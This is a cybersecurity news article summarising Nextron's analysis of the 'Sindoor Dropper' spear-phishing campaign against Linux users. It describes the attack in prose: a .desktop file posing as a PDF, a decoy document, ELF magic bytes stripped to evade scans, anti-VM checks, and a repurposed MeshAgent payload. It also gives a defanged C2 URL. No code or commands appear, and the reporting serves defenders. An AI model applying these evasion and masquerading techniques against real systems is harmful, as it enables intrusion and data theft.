Redazione RHC : 31 August 2025 10:04
An insidious malware attack known as “Sindoor Dropper” targets Linux operating systems, leveraging sophisticated spear-phishing methods and a complex, multi-stage infection process. The insidious operation targets users with lures related to the recent Pakistan-India conflict, known as Operation Sindoor, to trick them into activating malicious files.
The Sindoor Dropper campaign highlights an evolution in threat actors’ attack techniques, demonstrating a clear focus on Linux environments, which are less targeted by phishing campaigns.
The attack begins when a user opens a malicious .desktopfile, named “Note_Warfare_Ops_Sindoor.pdf.desktop”, which masquerades as a regular PDF document. According to the analysis of the Nextron system, once executed, it opens a benign PDF decoy to maintain the illusion of legitimacy, while silently launching a complex and heavily obfuscated infection process in the background.
The .desktopfile, Nextron reports, downloads several components, including an AES decryptor ( mayuw) and an encrypted downloader ( shjdfhd). A peculiar trait of this activity is the use of desktop files transformed into offensive tools, a technique previously attributed to the group APT36, also known as Transparent Tribe or Mythic Leopard, specializes in advanced and persistent threats.
The process in question was designed to elude both static and dynamic analysis. At the time of its discovery, the initial payload had left no trace on VirusTotal, thus remaining undetected. The decryptor, a Go binary compressed with UPX, is intentionally corrupted by removing its ELF magic bytes, presumably to bypass security scans on platforms like Google Docs. The .desktopfile restores these bytes on the victim’s computer to make the binary executable again.
This initiates a multi-stage process in which each component decrypts and executes the next. The chain includes basic anti-VM checks, such as verifying adapter names and vendors, blacklisting specific MAC address prefixes, and monitoring machine uptime.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command and control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, allowing them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
Redazione